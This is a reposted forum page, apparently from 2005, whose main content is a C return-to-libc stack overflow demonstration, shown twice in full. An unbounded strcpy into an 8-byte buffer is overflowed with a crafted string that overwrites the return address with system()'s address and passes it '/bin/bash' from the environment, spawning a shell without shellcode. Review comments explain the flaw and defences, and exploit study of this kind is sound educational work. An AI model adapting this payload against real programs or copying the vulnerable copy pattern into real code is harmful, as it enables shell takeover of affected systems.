We don't need no stinkin SHELLCODE or executable stack MUtha Focker
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
* using system() so that we don't need shellcode or an executable stack
*
* Victim code must use system() and must have a useful command name as a
* string somewhere we can find, such as the SHELL environment variable.
*/
/*
 * Deliberately vulnerable victim routine for this demonstration.
 *
 * Copies the NUL-terminated string at cp into the 8-byte local array lame
 * with strcpy(), which performs no length check. Any input of 8 or more
 * characters writes past the end of lame; that is undefined behaviour and
 * is the overflow the rest of this file depends on.
 *
 * Returns 0 when control comes back normally.
 *
 * NOTE(review): do not reuse this pattern. A bounded copy that rejects or
 * truncates over-long input, e.g. snprintf(lame, sizeof lame, "%s", cp)
 * with the result checked, removes the overflow. Compiler stack protection
 * and fortified string functions are meant to turn this kind of write into
 * a controlled abort.
 */
int myfunc(char *cp)
{
char lame[8]; /* fixed 8-byte destination, automatic storage */
strcpy(lame,cp); /* unbounded copy: the caller decides how many bytes land here */
return 0;
}
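/*
 * Driver for the demonstration: builds an over-long string and passes it to
 * myfunc(), whose 8-byte buffer it overflows.
 *
 * The string is 24 characters plus the terminating NUL. Two 4-byte groups
 * are overwritten with addresses that, according to the original comments,
 * the author read out of one particular process with gdb. Both are stored
 * least-significant byte first.
 *
 * NOTE(review): the two addresses and the offsets 12 and 20 presumably match
 * the frame layout and memory map of the author's own build; they will
 * generally differ on another build, and between runs where address-space
 * layout randomisation is enabled. A non-executable stack does not stop this
 * technique, because no injected code runs; stack protectors and a bounded
 * copy in myfunc() are the relevant defences.
 *
 * argc, argv and envp are unused.
 */
int main(int argc, char **argv, char **envp)
{
    char nasty[] = "@@@@@@@@@@@@@@@@@@@@6789";

    /* system() at 0x0804841c from gdb's "print system" */
    nasty[12] = 0x1c;
    nasty[13] = 0x84;
    nasty[14] = 0x04;
    nasty[15] = 0x08;
    /***************/
    /* "/bin/bash" in the environment, found with gdb's "x" (0xbfffffb7) */
    nasty[20] = 0xb7;
    nasty[21] = 0xff;
    nasty[22] = 0xff;
    nasty[23] = 0xbf;

    myfunc(nasty);

    /* expect a seg fault after the exploit */
    /* Reached only if myfunc() returned to its real caller. */
    printf("program not smashed\n"); /* "\n" restored; the page showed a bare 'n' */
    exit(0);

    /*
     * Never reached because of exit(0) above. Presumably kept so that the
     * program references system(), which the header comment names as a
     * precondition ("Victim code must use system()").
     */
    return system("date");
}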
--
##############################################################
# Antonomasia ant@notatla.demon.co.uk #
# See http://www.notatla.demon.co.uk/ #
##############################################################
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
* using system() so that we don't need shellcode or an executable stack
*
* Victim code must use system() and must have a useful command name as a
* string somewhere we can find, such as the SHELL environment variable.
*/
/*
 * Deliberately vulnerable victim routine for this demonstration.
 *
 * Copies the NUL-terminated string at cp into the 8-byte local array lame
 * with strcpy(), which performs no length check. Any input of 8 or more
 * characters writes past the end of lame; that is undefined behaviour and
 * is the overflow the rest of this file depends on.
 *
 * Returns 0 when control comes back normally.
 *
 * NOTE(review): do not reuse this pattern. A bounded copy that rejects or
 * truncates over-long input, e.g. snprintf(lame, sizeof lame, "%s", cp)
 * with the result checked, removes the overflow. Compiler stack protection
 * and fortified string functions are meant to turn this kind of write into
 * a controlled abort.
 */
int myfunc(char *cp)
{
char lame[8]; /* fixed 8-byte destination, automatic storage */
strcpy(lame,cp); /* unbounded copy: the caller decides how many bytes land here */
return 0;
}
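/*
 * Driver for the demonstration: builds an over-long string and passes it to
 * myfunc(), whose 8-byte buffer it overflows.
 *
 * The string is 24 characters plus the terminating NUL. Two 4-byte groups
 * are overwritten with addresses that, according to the original comments,
 * the author read out of one particular process with gdb. Both are stored
 * least-significant byte first.
 *
 * NOTE(review): the two addresses and the offsets 12 and 20 presumably match
 * the frame layout and memory map of the author's own build; they will
 * generally differ on another build, and between runs where address-space
 * layout randomisation is enabled. A non-executable stack does not stop this
 * technique, because no injected code runs; stack protectors and a bounded
 * copy in myfunc() are the relevant defences.
 *
 * argc, argv and envp are unused.
 */
int main(int argc, char **argv, char **envp)
{
    char nasty[] = "@@@@@@@@@@@@@@@@@@@@6789";

    /* system() at 0x0804841c from gdb's "print system" */
    nasty[12] = 0x1c;
    nasty[13] = 0x84;
    nasty[14] = 0x04;
    nasty[15] = 0x08;
    /***************/
    /* "/bin/bash" in the environment, found with gdb's "x" (0xbfffffb7) */
    nasty[20] = 0xb7;
    nasty[21] = 0xff;
    nasty[22] = 0xff;
    nasty[23] = 0xbf;

    myfunc(nasty);

    /* expect a seg fault after the exploit */
    /* Reached only if myfunc() returned to its real caller. */
    printf("program not smashed\n"); /* "\n" restored; the page showed a bare 'n' */
    exit(0);

    /*
     * Never reached because of exit(0) above. Presumably kept so that the
     * program references system(), which the header comment names as a
     * precondition ("Victim code must use system()").
     */
    return system("date");
}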
--
##############################################################
# Antonomasia ant@notatla.demon.co.uk #
# See http://www.notatla.demon.co.uk/ #
##############################################################
[Edited on Oct 22, 2005 1:48AM]